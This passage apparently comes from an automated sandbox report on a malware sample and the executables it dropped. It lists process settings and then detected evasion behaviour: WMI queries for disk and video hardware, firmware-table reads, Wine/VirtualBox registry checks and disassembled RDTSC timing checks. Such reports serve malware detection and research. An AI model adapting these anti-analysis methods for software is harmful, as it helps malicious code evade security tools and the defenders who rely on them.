                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9717
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSystem information queried: FirmwareTableInformation
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5EB0 second address: CF5EBA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5EBA second address: CF5ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0EC4CB7FD0h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5ED0 second address: CF5EFB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0EC4502028h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5EFB second address: CF5F05 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0EC4CB7FC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF4E60 second address: CF4E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF4FB4 second address: CF4FD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F0EC4CB7FC6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF4FD8 second address: CF4FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF4FEB second address: CF5016 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007F0EC4CB7FC6h 0x00000009 pop edx 0x0000000a js 00007F0EC4CB7FCCh 0x00000010 jnc 00007F0EC4CB7FC6h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F0EC4CB7FC6h 0x00000021 jmp 00007F0EC4CB7FCAh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5183 second address: CF518E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF542F second address: CF5438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5438 second address: CF543E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF543E second address: CF5442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF5442 second address: CF545C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0EC4502016h 0x00000008 jmp 00007F0EC450201Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF545C second address: CF5465 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF8172 second address: CF8176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF8176 second address: CF822F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 add dword ptr [esp], 74600AE7h 0x0000000e mov dx, cx 0x00000011 push 00000003h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0EC4CB7FC8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jp 00007F0EC4CB7FC6h 0x00000033 add dword ptr [ebp+122D3A02h], ebx 0x00000039 push 00000000h 0x0000003b mov edx, dword ptr [ebp+122D3B5Dh] 0x00000041 push 00000003h 0x00000043 sbb dx, 523Eh 0x00000048 sub di, 411Fh 0x0000004d call 00007F0EC4CB7FC9h 0x00000052 pushad 0x00000053 js 00007F0EC4CB7FD6h 0x00000059 jmp 00007F0EC4CB7FD0h 0x0000005e jmp 00007F0EC4CB7FD2h 0x00000063 popad 0x00000064 push eax 0x00000065 jmp 00007F0EC4CB7FD2h 0x0000006a mov eax, dword ptr [esp+04h] 0x0000006e jmp 00007F0EC4CB7FD4h 0x00000073 mov eax, dword ptr [eax] 0x00000075 pushad 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF822F second address: CF8279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F0EC4502024h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 js 00007F0EC4502020h 0x00000019 pushad 0x0000001a jo 00007F0EC4502016h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 pop eax 0x00000024 mov dword ptr [ebp+122D2144h], esi 0x0000002a lea ebx, dword ptr [ebp+1245CFB5h] 0x00000030 mov si, 5F23h 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push esi 0x0000003a pop esi 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF8279 second address: CF8294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CF8294 second address: CF82B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0EC4502020h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D0B283 second address: D0B28D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0EC4CB7FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D0B28D second address: D0B297 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0EC450201Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17626 second address: D1762E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17777 second address: D1777D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1777D second address: D1778D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4CB7FCCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1778D second address: D177A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F0EC450201Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177A9 second address: D177AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
